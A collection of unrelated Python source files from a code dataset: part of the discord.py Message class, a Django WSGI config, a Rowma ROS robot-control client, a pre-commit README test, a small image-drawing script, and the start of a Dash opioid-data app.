'_cs_clean_content', '_cs_raw_channel_mentions', 'nonce', 'pinned',
'role_mentions', '_cs_raw_role_mentions', 'type', 'call', 'flags',
'_cs_system_content', '_cs_guild', '_state', 'reactions', 'reference',
'application', 'activity', 'stickers')
def __init__(self, *, state, channel, data):
self._state = state
self.id = int(data['id'])
self.webhook_id = utils._get_as_snowflake(data, 'webhook_id')
self.reactions = [Reaction(message=self, data=d) for d in data.get('reactions', [])]
self.attachments = [Attachment(data=a, state=self._state) for a in data['attachments']]
self.embeds = [Embed.from_dict(a) for a in data['embeds']]
self.application = data.get('application')
self.activity = data.get('activity')
self.channel = channel
self.call = None
self._edited_timestamp = utils.parse_time(data['edited_timestamp'])
self.type = try_enum(MessageType, data['type'])
self.pinned = data['pinned']
self.flags = MessageFlags._from_value(data.get('flags', 0))
self.mention_everyone = data['mention_everyone']
self.tts = data['tts']
self.content = data['content']
self.nonce = data.get('nonce')
self.stickers = [Sticker(data=data, state=state) for data in data.get('stickers', [])]
try:
ref = data['message_reference']
except KeyError:
self.reference = None
else:
self.reference = ref = MessageReference.with_state(state, ref)
try:
resolved = data['referenced_message']
except KeyError:
pass
else:
if resolved is None:
ref.resolved = DeletedReferencedMessage(ref)
else:
# Right now the channel IDs match but maybe in the future they won't.
if ref.channel_id == channel.id:
chan = channel
else:
chan, _ = state._get_guild_channel(resolved)
ref.resolved = self.__class__(channel=chan, data=resolved, state=state)
for handler in ('author', 'member', 'mentions', 'mention_roles', 'call', 'flags'):
try:
getattr(self, '_handle_%s' % handler)(data[handler])
except KeyError:
continue
def __repr__(self):
return '<Message id={0.id} channel={0.channel!r} type={0.type!r} author={0.author!r} flags={0.flags!r}>'.format(self)
def _try_patch(self, data, key, transform=None):
try:
value = data[key]
except KeyError:
pass
else:
if transform is None:
setattr(self, key, value)
else:
setattr(self, key, transform(value))
def _add_reaction(self, data, emoji, user_id):
reaction = utils.find(lambda r: r.emoji == emoji, self.reactions)
is_me = data['me'] = user_id == self._state.self_id
if reaction is None:
reaction = Reaction(message=self, data=data, emoji=emoji)
self.reactions.append(reaction)
else:
reaction.count += 1
if is_me:
reaction.me = is_me
return reaction
def _remove_reaction(self, data, emoji, user_id):
reaction = utils.find(lambda r: r.emoji == emoji, self.reactions)
if reaction is None:
# already removed?
raise ValueError('Emoji already removed?')
# if reaction isn't in the list, we crash. This means discord
# sent bad data, or we stored improperly
reaction.count -= 1
if user_id == self._state.self_id:
reaction.me = False
if reaction.count == 0:
# this raises ValueError if something went wrong as well.
self.reactions.remove(reaction)
return reaction
def _clear_emoji(self, emoji):
to_check = str(emoji)
for index, reaction in enumerate(self.reactions):
if str(reaction.emoji) == to_check:
break
else:
# didn't find anything so just return
return
del self.reactions[index]
return reaction
def _update(self, data):
# In an update scheme, 'author' key has to be handled before 'member'
# otherwise they overwrite each other which is undesirable.
# Since there's no good way to do this we have to iterate over every
# handler rather than iterating over the keys which is a little slower
for key, handler in self._HANDLERS:
try:
value = data[key]
except KeyError:
continue
else:
handler(self, value)
# clear the cached properties
for attr in self._CACHED_SLOTS:
try:
delattr(self, attr)
except AttributeError:
pass
def _handle_edited_timestamp(self, value):
self._edited_timestamp = utils.parse_time(value)
def _handle_pinned(self, value):
self.pinned = value
def _handle_flags(self, value):
self.flags = MessageFlags._from_value(value)
def _handle_application(self, value):
self.application = value
def _handle_activity(self, value):
self.activity = value
def _handle_mention_everyone(self, value):
self.mention_everyone = value
def _handle_tts(self, value):
self.tts = value
def _handle_type(self, value):
self.type = try_enum(MessageType, value)
def _handle_content(self, value):
self.content = value
def _handle_attachments(self, value):
self.attachments = [Attachment(data=a, state=self._state) for a in value]
def _handle_embeds(self, value):
self.embeds = [Embed.from_dict(data) for data in value]
def _handle_nonce(self, value):
self.nonce = value
def _handle_author(self, author):
self.author = self._state.store_user(author)
if isinstance(self.guild, Guild):
found = self.guild.get_member(self.author.id)
if found is not None:
self.author = found
def _handle_member(self, member):
# The gateway now gives us full Member objects sometimes with the following keys
# deaf, mute, joined_at, roles
# For the sake of performance I'm going to assume that the only
# field that needs *updating* would be the joined_at field.
# If there is no Member object (for some strange reason), then we can upgrade
# ourselves to a more "partial" member object.
author = self.author
try:
# Update member reference
author._update_from_message(member)
except AttributeError:
# It's a user here
# TODO: consider adding to cache here
self.author = Member._from_message(message=self, data=member)
def _handle_mentions(self, mentions):
self.mentions = r = []
guild = self.guild
state = self._state
if not isinstance(guild, Guild):
self.mentions = [state.store_user(m) for m in mentions]
return
for mention in filter(None, mentions):
id_search = int(mention['id'])
member = guild.get_member(id_search)
if member is not None:
r.append(member)
else:
r.append(Member._try_upgrade(data=mention, guild=guild, state=state))
def _handle_mention_roles(self, role_mentions):
self.role_mentions = []
if isinstance(self.guild, Guild):
for role_id in map(int, role_mentions):
role = self.guild.get_role(role_id)
if role is not None:
self.role_mentions.append(role)
def _handle_call(self, call):
if call is None or self.type is not MessageType.call:
self.call = None
return
# we get the participant source from the mentions array or
# the author
participants = []
for uid in map(int, call.get('participants', [])):
if uid == self.author.id:
participants.append(self.author)
else:
user = utils.find(lambda u: u.id == uid, self.mentions)
if user is not None:
participants.append(user)
call['participants'] = participants
self.call = CallMessage(message=self, **call)
def _rebind_channel_reference(self, new_channel):
self.channel = new_channel
try:
del self._cs_guild
except AttributeError:
pass
@utils.cached_slot_property('_cs_guild')
def guild(self):
"""Optional[:class:`Guild`]: The guild that the message belongs to, if applicable."""
return getattr(self.channel, 'guild', None)
@utils.cached_slot_property('_cs_raw_mentions')
def raw_mentions(self):
"""List[:class:`int`]: A property that returns an array of user IDs matched with
the syntax of ``<@user_id>`` in the message content.
This allows you to receive the user IDs of mentioned users
even in a private message context.
"""
return [int(x) for x in re.findall(r'<@!?([0-9]+)>', self.content)]
@utils.cached_slot_property('_cs_raw_channel_mentions')
def raw_channel_mentions(self):
"""List[:class:`int`]: A property that returns an array of channel IDs matched with
the syntax of ``<#channel_id>`` in the message content.
"""
return [int(x) for x in re.findall(r'<#([0-9]+)>', self.content)]
@utils.cached_slot_property('_cs_raw_role_mentions')
def raw_role_mentions(self):
"""List[:class:`int`]: A property that returns an array of role IDs matched with
the syntax of ``<@&role_id>`` in the message content.
"""
return [int(x) for x in re.findall(r'<@&([0-9]+)>', self.content)]
@utils.cached_slot_property('_cs_channel_mentions')
def channel_mentions(self):
if self.guild is None:
return []
it = filter(None, map(self.guild.get_channel, self.raw_channel_mentions))
return utils._unique(it)
@utils.cached_slot_property('_cs_clean_content')
def clean_content(self):
""":class:`str`: A property that returns the content in a "cleaned up"
manner. This basically means that mentions are transformed
into the way the client shows it. e.g. ``<#id>`` will transform
into ``#name``.
This will also transform @everyone and @here mentions into
non-mentions.
.. note::
This *does not* escape markdown. If you want to escape
markdown then use :func:`utils.escape_markdown` along
with this function.
"""
transformations = {
re.escape('<#%s>' % channel.id): '#' + channel.name
for channel in self.channel_mentions
}
mention_transforms = {
re.escape('<@%s>' % member.id): '@' + member.display_name
for member in self.mentions
}
# add the <@!user_id> cases as well..
second_mention_transforms = {
re.escape('<@!%s>' % member.id): '@' + member.display_name
for member in self.mentions
}
transformations.update(mention_transforms)
transformations.update(second_mention_transforms)
if self.guild is not None:
role_transforms = {
re.escape('<@&%s>' % role.id): '@' + role.name
for role in self.role_mentions
}
transformations.update(role_transforms)
def repl(obj):
return transformations.get(re.escape(obj.group(0)), '')
pattern = re.compile('|'.join(transformations.keys()))
result = pattern.sub(repl, self.content)
return escape_mentions(result)
@property
def created_at(self):
""":class:`datetime.datetime`: The message's creation time in UTC."""
return utils.snowflake_time(self.id)
@property
def edited_at(self):
"""Optional[:class:`datetime.datetime`]: A naive UTC datetime object containing the edited time of the message."""
return self._edited_timestamp
@property
def jump_url(self):
""":class:`str`: Returns a URL that allows the client to jump to this message."""
guild_id = getattr(self.guild, 'id', '@me')
return 'https://discord.com/channels/{0}/{1.channel.id}/{1.id}'.format(guild_id, self)
def is_system(self):
""":class:`bool`: Whether the message is a system message.
.. versionadded:: 1.3
"""
return self.type is not MessageType.default
@utils.cached_slot_property('_cs_system_content')
def system_content(self):
r""":class:`str`: A property that returns the content that is rendered
regardless of the :attr:`Message.type`.
In the case of :attr:`MessageType.default`\, this just returns the
regular :attr:`Message.content`. Otherwise this returns an English
message denoting the contents of the system message.
"""
if self.type is MessageType.default:
return self.content
if self.type is MessageType.pins_add:
return '{0.name} pinned a message to this channel.'.format(self.author)
if self.type is MessageType.recipient_add:
return '{0.name} added {1.name} to the group.'.format(self.author, self.mentions[0])
if self.type is MessageType.recipient_remove:
return '{0.name} removed {1.name} from the group.'.format(self.author, self.mentions[0])
if self.type is MessageType.channel_name_change:
return '{0.author.name} changed the channel name: {0.content}'.format(self)
if self.type is MessageType.channel_icon_change:
return '{0.author.name} changed the channel icon.'.format(self)
if self.type is MessageType.new_member:
formats = [
"{0} joined the party.",
"{0} is here.",
"Welcome, {0}. We hope you brought pizza.",
"A wild {0} appeared.",
"{0} just landed.",
"{0} just slid into the server.",
"{0} just showed up!",
"Welcome {0}. Say hi!",
"{0} hopped into the server.",
"Everyone welcome {0}!",
"Glad you're here, {0}.",
"Good to see you, {0}.",
"Yay you made it, {0}!",
]
# manually reconstruct the epoch with millisecond precision, because
# datetime.datetime.timestamp() doesn't return the exact posix
# timestamp with the precision that we need
created_at_ms = int((self.created_at - datetime.datetime(1970, 1, 1)).total_seconds() * 1000)
return formats[created_at_ms % len(formats)].format(self.author.name)
if self.type is MessageType.call:
# we're at the call message type now, which is a bit more complicated.
# we can make the assumption that Message.channel is a PrivateChannel
# with the type ChannelType.group or ChannelType.private
call_ended = self.call.ended_timestamp is not None
if self.channel.me in self.call.participants:
return '{0.author.name} started a call.'.format(self)
elif call_ended:
return 'You missed a call from {0.author.name}'.format(self)
else:
return '{0.author.name} started a call \N{EM DASH} Join the call.'.format(self)
if self.type is MessageType.premium_guild_subscription:
return '{0.author.name} just boosted the server!'.format(self)
if self.type is MessageType.premium_guild_tier_1:
return '{0.author.name} just boosted the server! {0.guild} has achieved **Level 1!**'.format(self)
if self.type is MessageType.premium_guild_tier_2:
return '{0.author.name} just boosted the server! {0.guild} has achieved **Level 2!**'.format(self)
if self.type is MessageType.premium_guild_tier_3:
return '{0.author.name} just boosted the server! {0.guild} has achieved **Level 3!**'.format(self)
if self.type is MessageType.channel_follow_add:
return '{0.author.name} has added {0.content} to this channel'.format(self)
async def delete(self, *, delay=None):
"""|coro|
Deletes the message.
Your own messages could be deleted without any proper permissions. However to
delete other people's messages, you need the :attr:`~Permissions.manage_messages`
permission.
.. versionchanged:: 1.1
Added the new ``delay`` keyword-only parameter.
Parameters
-----------
delay: Optional[:class:`float`]
If provided, the number of seconds to wait in the background
before deleting the message. If the deletion fails then it is silently ignored.
Raises
------
Forbidden
You do not have proper permissions to delete the message.
NotFound
The message was deleted already
HTTPException
Deleting the message failed.
"""
if delay is not None:
async def delete():
await asyncio.sleep(delay)
try:
await self._state.http.delete_message(self.channel.id, self.id)
except HTTPException:
pass
asyncio.ensure_future(delete(), loop=self._state.loop)
else:
await self._state.http.delete_message(self.channel.id, self.id)
async def edit(self, **fields):
"""|coro|
Edits the message.
The content must be able to be transformed into a string via ``str(content)``.
.. versionchanged:: 1.3
The ``suppress`` keyword-only parameter was added.
Parameters
-----------
content: Optional[:class:`str`]
The new content to replace the message with.
Could be ``None`` to remove the content.
embed: Optional[:class:`Embed`]
The new embed to replace the original with.
Could be ``None`` to remove the embed.
suppress: :class:`bool`
Whether to suppress embeds for the message. This removes
all the embeds if set to ``True``. If set to ``False``
this brings the embeds back if they were suppressed.
Using this parameter requires :attr:`~.Permissions.manage_messages`.
delete_after: Optional[:class:`float`]
If provided, the number of seconds to wait in the background
before deleting the message we just edited. If the deletion fails,
then it is silently ignored.
allowed_mentions: Optional[:class:`~discord.AllowedMentions`]
Controls the mentions being processed in this message. If this is
passed, then the object is merged with :attr:`~discord.Client.allowed_mentions`.
The merging behaviour only overrides attributes that have been explicitly passed
to the object, otherwise it uses the attributes set in :attr:`~discord.Client.allowed_mentions`.
If no object is passed at all then the defaults given by :attr:`~discord.Client.allowed_mentions`
are used instead.
.. versionadded:: 1.4
Raises
-------
HTTPException
Editing the message failed.
Forbidden
Tried to suppress a message without permissions or
edited a message's content or embed that isn't yours.
"""
try:
content = fields['content']
except KeyError:
pass
else:
if content is not None:
fields['content'] = str(content)
try:
embed = fields['embed']
except KeyError:
pass
else:
if embed is not None:
fields['embed'] = embed.to_dict()
try:
suppress = fields.pop('suppress')
except KeyError:
pass
else:
flags = MessageFlags._from_value(self.flags.value)
flags.suppress_embeds = suppress
fields['flags'] = flags.value
delete_after = fields.pop('delete_after', None)
try:
allowed_mentions = fields.pop('allowed_mentions')
except KeyError:
pass
else:
if allowed_mentions is not None:
if self._state.allowed_mentions is not None:
allowed_mentions = self._state.allowed_mentions.merge(allowed_mentions).to_dict()
else:
allowed_mentions = allowed_mentions.to_dict()
fields['allowed_mentions'] = allowed_mentions
if fields:
data = await self._state.http.edit_message(self.channel.id, self.id, **fields)
self._update(data)
if delete_after is not None:
await self.delete(delay=delete_after)
async def publish(self):
"""|coro|
Publishes this message to your announcement channel.
If the message is not your own then the :attr:`~Permissions.manage_messages`
permission is needed.
Raises
-------
Forbidden
You do not have the proper permissions to publish this message.
HTTPException
Publishing the message failed.
"""
await self._state.http.publish_message(self.channel.id, self.id)
async def pin(self, *, reason=None):
"""|coro|
Pins the message.
You must have the :attr:`~Permissions.manage_messages` permission to do
this in a non-private channel context.
Parameters
-----------
reason: Optional[:class:`str`]
The reason for pinning the message. Shows up on the audit log.
.. versionadded:: 1.4
Raises
-------
Forbidden
You do not have permissions to pin the message.
NotFound
The message or channel was not found or deleted.
HTTPException
Pinning the message failed, probably due to the channel
having more than 50 pinned messages.
"""
await self._state.http.pin_message(self.channel.id, self.id, reason=reason)
self.pinned = True
async def unpin(self, *, reason=None):
"""|coro|
Unpins the message.
You must have the :attr:`~Permissions.manage_messages` permission to do
this in a non-private channel context.
Parameters
-----------
reason: Optional[:class:`str`]
The reason for unpinning the message. Shows up on the audit log.
.. versionadded:: 1.4
Raises
-------
Forbidden
You do not have permissions to unpin the message.
NotFound
The message or channel was not found or deleted.
HTTPException
Unpinning the message failed.
"""
await self._state.http.unpin_message(self.channel.id, self.id, reason=reason)
self.pinned = False
async def add_reaction(self, emoji):
"""|coro|
Add a reaction to the message.
The emoji may be a unicode emoji or a custom guild :class:`Emoji`.
You must have the :attr:`~Permissions.read_message_history` permission
to use this. If nobody else has reacted to the message using this
emoji, the :attr:`~Permissions.add_reactions` permission is required.
Parameters
------------
emoji: Union[:class:`Emoji`, :class:`Reaction`, :class:`PartialEmoji`, :class:`str`]
The emoji to react with.
Raises
--------
HTTPException
Adding the reaction failed.
Forbidden
You do not have the proper permissions to react to the message.
NotFound
The emoji you specified was not found.
InvalidArgument
The emoji parameter is invalid.
"""
emoji = convert_emoji_reaction(emoji)
await self._state.http.add_reaction(self.channel.id, self.id, emoji)
async def remove_reaction(self, emoji, member):
"""|coro|
Remove a reaction by the member from the message.
The emoji may be a unicode emoji or a custom guild :class:`Emoji`.
If the reaction is not your own (i.e. ``member`` parameter is not you) then
the :attr:`~Permissions.manage_messages` permission is needed.
The ``member`` parameter must represent a member and meet
the :class:`abc.Snowflake` abc.
Parameters
------------
emoji: Union[:class:`Emoji`, :class:`Reaction`, :class:`PartialEmoji`, :class:`str`]
The emoji to remove.
member: :class:`abc.Snowflake`
The member for which to remove the reaction.
Raises
--------
HTTPException
Removing the reaction failed.
Forbidden
You do not have the proper permissions to remove the reaction.
NotFound
The member or emoji you specified was not found.
InvalidArgument
The emoji parameter is invalid.
"""
emoji = convert_emoji_reaction(emoji)
if member.id == self._state.self_id:
await self._state.http.remove_own_reaction(self.channel.id, self.id, emoji)
else:
await self._state.http.remove_reaction(self.channel.id, self.id, emoji, member.id)
async def clear_reaction(self, emoji):
"""|coro|
Clears a specific reaction from the message.
The emoji may be a unicode emoji or a custom guild :class:`Emoji`.
You need the :attr:`~Permissions.manage_messages` permission to use this.
.. versionadded:: 1.3
Parameters
-----------
emoji: Union[:class:`Emoji`, :class:`Reaction`, :class:`PartialEmoji`, :class:`str`]
The emoji to clear.
Raises
--------
HTTPException
Clearing the reaction failed.
Forbidden
You do not have the proper permissions to clear the reaction.
NotFound
The emoji you specified was not found.
InvalidArgument
The emoji parameter is invalid.
"""
emoji = convert_emoji_reaction(emoji)
await self._state.http.clear_single_reaction(self.channel.id, self.id, emoji)
async def clear_reactions(self):
"""|coro|
Removes all the reactions from the message.
You need the :attr:`~Permissions.manage_messages` permission to use this.
Raises
--------
HTTPException
Removing the reactions failed.
Forbidden
You do not have the proper permissions to remove all the reactions.
"""
await self._state.http.clear_reactions(self.channel.id, self.id)
async def ack(self):
"""|coro|
Marks this message as read.
The user must not be a bot user.
Raises
-------
HTTPException
Acking failed.
ClientException
You must not be a bot user.
"""
state = self._state
if state.is_bot:
raise ClientException('Must not be a bot account to ack messages.')
return await state.http.ack_message(self.channel.id, self.id)
async def reply(self, content=None, **kwargs):
"""|coro|
A shortcut method to :meth:`abc.Messageable.send` to reply to the
:class:`Message`.
.. versionadded:: 1.6
Raises
--------
~discord.HTTPException
Sending the message failed.
~discord.Forbidden
You do not have the proper permissions to send the message.
~discord.InvalidArgument
The ``files`` list is not of the appropriate size or
you specified both ``file`` and ``files``.
Returns
---------
:class:`Message`
The message that was sent.
"""
return await self.channel.send(content, reference=self, **kwargs)
def to_reference(self):
"""Creates a :class:`~discord.MessageReference` from the current message.
.. versionadded:: 1.6
Returns
---------
:class:`~discord.MessageReference`
The reference to this message.
"""
return MessageReference.from_message(self)
def to_message_reference_dict(self):
data = {
'message_id': self.id,
'channel_id': self.channel.id,
}
if self.guild is not None:
data['guild_id'] = self.guild.id
return data
def implement_partial_methods(cls):
msg = Message
for name in cls._exported_names:
func = getattr(msg, name)
setattr(cls, name, func)
return cls
@implement_partial_methods
class PartialMessage(Hashable):
"""Represents a partial message to aid with working messages when only
a message and channel ID are present.
There are two ways to construct this class. The first one is through
the constructor itself, and the second is via
:meth:`TextChannel.get_partial_message` or :meth:`DMChannel.get_partial_message`.
Note that this class is trimmed down and has no rich attributes.
.. versionadded:: 1.6
.. container:: operations
.. describe:: x == y
Checks if two partial messages are equal.
.. describe:: x != y
Checks if two partial messages are not equal.
.. describe:: hash(x)
Returns the partial message's hash.
Attributes
-----------
channel: Union[:class:`TextChannel`, :class:`DMChannel`]
The channel associated with this partial message.
id: :class:`int`
The message ID.
"""
__slots__ = ('channel', 'id', '_cs_guild', '_state')
_exported_names = (
'jump_url',
'delete',
'publish',
'pin',
'unpin',
'add_reaction',
'remove_reaction',
'clear_reaction',
'clear_reactions',
'reply',
'to_reference',
'to_message_reference_dict',
)
def __init__(self, *, channel, id):
if channel.type not in (ChannelType.text, ChannelType.news, ChannelType.private):
raise TypeError('Expected TextChannel or DMChannel not %r' % type(channel))
self.channel = channel
self._state = channel._state
self.id = id
def _update(self, data):
# This is used for duck typing purposes.
# Just do nothing with the data.
pass
# Also needed for duck typing purposes
# n.b. not exposed
pinned = property(None, lambda x, y: ...)
def __repr__(self):
return '<PartialMessage id={0.id} channel={0.channel!r}>'.format(self)
@property
def created_at(self):
""":class:`datetime.datetime`: The partial message's creation time in UTC."""
return utils.snowflake_time(self.id)
@utils.cached_slot_property('_cs_guild')
def guild(self):
"""Optional[:class:`Guild`]: The guild that the partial message belongs to, if applicable."""
return getattr(self.channel, 'guild', None)
async def fetch(self):
"""|coro|
Fetches the partial message to a full :class:`Message`.
Raises
--------
NotFound
The message was not found.
Forbidden
You do not have the permissions required to get a message.
HTTPException
Retrieving the message failed.
Returns
--------
:class:`Message`
The full message.
"""
data = await self._state.http.get_message(self.channel.id, self.id)
return self._state.create_message(channel=self.channel, data=data)
async def edit(self, **fields):
"""|coro|
Edits the message.
The content must be able to be transformed into a string via ``str(content)``.
.. versionchanged:: 1.7
:class:`discord.Message` is returned instead of ``None`` if an edit took place.
Parameters
-----------
content: Optional[:class:`str`]
The new content to replace the message with.
Could be ``None`` to remove the content.
embed: Optional[:class:`Embed`]
The new embed to replace the original with.
Could be ``None`` to remove the embed.
suppress: :class:`bool`
Whether to suppress embeds for the message. This removes
all the embeds if set to ``True``. If set to ``False``
this brings the embeds back if they were suppressed.
Using this parameter requires :attr:`~.Permissions.manage_messages`.
delete_after: Optional[:class:`float`]
If provided, the number of seconds to wait in the background
before deleting the message we just edited. If the deletion fails,
then it is silently ignored.
allowed_mentions: Optional[:class:`~discord.AllowedMentions`]
Controls the mentions being processed in this message. If this is
passed, then the object is merged with :attr:`~discord.Client.allowed_mentions`.
The merging behaviour only overrides attributes that have been explicitly passed
to the object, otherwise it uses the attributes set in :attr:`~discord.Client.allowed_mentions`.
If no object is passed at all then the defaults given by :attr:`~discord.Client.allowed_mentions`
are used instead.
Raises
-------
NotFound
The message was not found.
HTTPException
Editing the message failed.
Forbidden
Tried to suppress a message without permissions or
edited a message's content or embed that isn't yours.
Returns
---------
Optional[:class:`Message`]
The message that was edited.
"""
try:
content = fields['content']
except KeyError:
pass
else:
if content is not None:
fields['content'] = str(content)
try:
embed = fields['embed']
except KeyError:
pass
else:
if embed is not None:
fields['embed'] = embed.to_dict()
try:
suppress = fields.pop('suppress')
except KeyError:
pass
else:
flags = MessageFlags._from_value(0)
flags.suppress_embeds = suppress
fields['flags'] = flags.value
delete_after = fields.pop('delete_after', None)
try:
allowed_mentions = fields.pop('allowed_mentions')
except KeyError:
pass
else:
if allowed_mentions is not None:
if self._state.allowed_mentions is not None:
allowed_mentions = self._state.allowed_mentions.merge(allowed_mentions).to_dict()
else:
allowed_mentions = allowed_mentions.to_dict()
fields['allowed_mentions'] = allowed_mentions
if fields:
data = await self._state.http.edit_message(self.channel.id, self.id, **fields)
if delete_after is not None:
await self.delete(delay=delete_after)
if fields:
return self._state.create_message(channel=self.channel, data=data)
|
py | 7df7f9ccf2048dff63d71afda74b56e1397021ef | """
WSGI config for ds project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ds.settings")
application = get_wsgi_application()
|
py | 7df7fb79dfb3105c0c881ae9b954bd673a37e84d | import socketio
import uuid
import json
import requests
import re
class Rowma:
"""
Rowma class implements some methods to operate connected robots.
Attributes:
base_url (string): ConnectionManager URL
"""
def __init__(self, base_url = 'https://rowma.moriokalab.com'):
self.base_url = base_url
self.sio = socketio.Client()
self.uuid = str(uuid.uuid4())
self.namespace = '/rowma'
self.handlers = {}
def connect(self):
"""connect to ConnectionManager
Returns:
void: No return values
Examples:
>>> rowma.connect()
Note:
sleep(1) (1 second) exists in this method to wait for connection establishment.
"""
self.sio.connect(self.base_url, namespaces=[self.namespace])
# sleep 1 second for connection establishment
self.sio.sleep(1)
payload = { 'applicationUuid': self.uuid }
self.sio.emit('register_application', data=payload, namespace=self.namespace)
self.sio.on('topic_to_application', handler=self._baseHandler, namespace=self.namespace)
def run_launch(self, uuid, command):
"""Send `roslaunch` command to the specified robot
Args:
uuid (string): Robot UUID
command (string): An argument of roslaunch command like 'my_pkg test.launch'
Returns:
void: No return values
Examples:
>>> rowma.connect()
>>> rowma.run_launch('xxxx-xxxx-xxxx', 'my_pkg test.launch')
roslaunch my_pkg test.launch will be executed at xxxx-xxxx-xxxx
"""
destination = { 'type': 'robot', 'uuid': uuid }
payload = { 'destination': destination, 'command': command }
self.sio.emit('run_launch', data=payload, namespace=self.namespace)
def publish(self, uuid, topic, msg):
"""Publish a topic to the specified robot
Args:
uuid (string): Robot UUID
topic (string): Topic name
msg (any): Topic message based on the topic's type
Returns:
void: No return values
Examples:
>>> rowma.connect()
>>> rowma.publish('xxxx-xxxx-xxxx', '/chatter', {'data': 'Hello World!'})
Note:
This method can not publish a topic to an Application, only to Robot.
"""
destination = { 'type': 'robot', 'uuid': uuid }
topic_message = {
"op": "publish",
"topic": topic,
"msg": msg
}
payload = { 'destination': destination, 'msg': topic_message }
self.sio.emit('topic_transfer', payload, namespace=self.namespace)
def set_topic_route(self, dest_uuid, topic_dest_type, topic_dest_uuid, topic, alias=None):
"""Create a route of a topic
Args:
dest_uuid (string): The destination's UUID of this instruction
topic_dest_type (string): 'robot' or 'application' for topic destination
topic_dest_uuid (string): The destination's UUID of the topic
topic (string): Topic name
alias? (string): Alias of the topic name, default: None
Returns:
void: No return values
Examples:
>>> rowma.connect()
>>> rowma.set_topic_route('xxxx-xxxx-robot', 'application', 'xxxx-xxxx-application, '/chatter'')
Note:
This method is a little tricky
"""
destination = { 'type': 'robot', 'uuid': dest_uuid }
topic_destination = { 'type': topic_dest_type, 'uuid': topic_dest_uuid }
msg = {
'op': 'subscribe',
'topicDestination': topic_destination,
'topic': topic
}
if alias: msg.update({ 'alias': alias })
payload = {
'destination': destination,
'msg': msg
}
self.sio.emit('topic_transfer', payload, namespace=self.namespace)
def run_rosrun(self, uuid, command, args=''):
"""Send `rosrun` command to the specified robot
Args:
uuid (string): Robot UUID
command (string): The first argument of rosrun command like 'my_pkg my_node'
args (string, optional): The other arguments for rosrun command like 'setting.yml'
Returns:
void: No return values
Examples:
>>> rowma.connect()
>>> rowma.run_rosrun('xxxx-xxxx-xxxx', 'my_pkg my_node', 'setting.yml')
rosrun my_pkg my_node setting.yml at xxxx-xxxx-xxxx
"""
destination = { 'type': 'robot', 'uuid': uuid }
payload = {
'destination': destination,
'command': command,
'args': args
}
self.sio.emit('run_rosrun', payload, namespace=self.namespace)
def kill_nodes(self, uuid, rosnodes):
"""Kill running rosnodes in the specified robot
Args:
uuid (string): Robot UUID
rosnodes (Array<string>): The array of rosnodes' name
Returns:
void: No return values
Examples:
>>> rowma.connect()
>>> rowma.kill_nodes('xxxx-xxxx-xxxx', ['/chatter', '/chatter2'])
"""
destination = { 'type': 'robot', 'uuid': uuid }
payload = {
'destination': destination,
'rosnodes': rosnodes
}
self.sio.emit('kill_rosnodes', payload, namespace=self.namespace)
# TODO: Error handling
def get_current_connection_list(self):
"""Fetch currently connected robots from ConnectionManager
Returns:
Robot List (Array<dict>): An array of robots
Examples:
>>> rowma.get_current_connection_list()
[{'uuid': 'xxxx-xxxx-xxxx', 'rosnodes': [], ......}]
"""
r = requests.get(self.base_url + '/list_connections')
return json.loads(r.text)
# TODO: Error handling
def get_robot_status(self, uuid):
"""Fetch a robot by uuid from ConnectionManager
Args:
uuid (string): Robot UUID
Returns:
Robot (dict): An dict of a robot
Examples:
>>> rowma.get_robot_status('xxxx-xxxx-xxxx')
{'uuid': 'xxxx-xxxx-xxxx', 'rosnodes': [], ......}
"""
params = { 'uuid': uuid }
r = requests.get(self.base_url + '/robots', params=params)
return json.loads(r.text)
def subscribe(self, topic, handler):
"""Add subscriber function to a topic
Args:
uuid (string): Robot UUID
Returns:
void: No return values
Examples:
>>> rowma.connect()
>>> def callback(msg):
... print(msg)
>>> rowma.subscribe('/chatter', callback)
"""
self.handlers[topic] = handler
def set_robot_uuid(self, robot_uuid):
"""Set robot UUID to current Application data stored in ConnectionManager
Args:
uuid (string): Robot UUID
Returns:
void: No return values
Examples:
>>> rowma.connect()
>>> rowma.set_robot_uuid('xxxx-xxxx-xxxx')
Note:
This method is used when subscribing roslaunch_log or rosrun_log
"""
payload = {
'uuid': self.uuid,
'robotUuid': robot_uuid
}
self.sio.emit('update_application', payload, namespace=self.namespace)
def _baseHandler(self, msg):
topics = self.handlers.keys()
handler = None
for topic in topics:
r = re.compile(topic)
if re.match(r, msg['topic']) is not None:
handler = self.handlers[topic]
handler(msg)
|
py | 7df7fcfeaee8c378f6d6065c01e893467cd9eb51 | from pre_commit_hooks.check_yaml import yaml
def test_readme_contains_all_hooks():
with open('README.md', encoding='UTF-8') as f:
readme_contents = f.read()
with open('.pre-commit-hooks.yaml', encoding='UTF-8') as f:
hooks = yaml.load(f)
for hook in hooks:
assert f'`{hook["id"]}`' in readme_contents
|
py | 7df7fdd349c933e4770ab847674578dde4932880 | import imageio
import matplotlib.pyplot as plt
import Image
import numpy as np
im = Image.new("RGB", (169,169), "white")
pic = np.array(im)
im=pic
t=70 #taille de la croix
col=-170
lig=170
pioncollig=[0,0] #pion colonne numero puis ligne numero
c=[87+pioncollig[0]*col,87+pioncollig[1]*lig] #centre du pion en bas a gauche
for k in range(169):
for j in range(169):
im[k,j] = (156,97,65)
for o in range(-t,t):
for a in range(-t,t):
b=o*2
if -5<o+a-b<5:
im[c[0]+o,c[1]+a] = (20,20,20)
im[c[0]+o,170-c[1]-a] = (20,20,20)
imageio.imsave("dagger.png", im)
|
py | 7df7ff5b24d9265a3f7ee6caf71204a308aea048 | import os
import pathlib
import re
import dash
import dash_core_components as dcc
import dash_html_components as html
import pandas as pd
from dash.dependencies import Input, Output, State
import cufflinks as cf
# Initialize app
app = dash.Dash(
__name__,
meta_tags=[
{"name": "viewport", "content": "width=device-width, initial-scale=1.0"}
],
)
app.title = "US Opioid Epidemic"
server = app.server
# Load data
APP_PATH = str(pathlib.Path(__file__).parent.resolve())
df_lat_lon = pd.read_csv(
os.path.join(APP_PATH, os.path.join("data", "lat_lon_counties.csv"))
)
df_lat_lon["FIPS "] = df_lat_lon["FIPS "].apply(lambda x: str(x).zfill(5))
df_full_data = pd.read_csv(
os.path.join(
APP_PATH, os.path.join("data", "age_adjusted_death_rate_no_quotes.csv")
)
)
df_full_data["County Code"] = df_full_data["County Code"].apply(
lambda x: str(x).zfill(5)
)
df_full_data["County"] = (
df_full_data["Unnamed: 0"] + ", " + df_full_data.County.map(str)
)
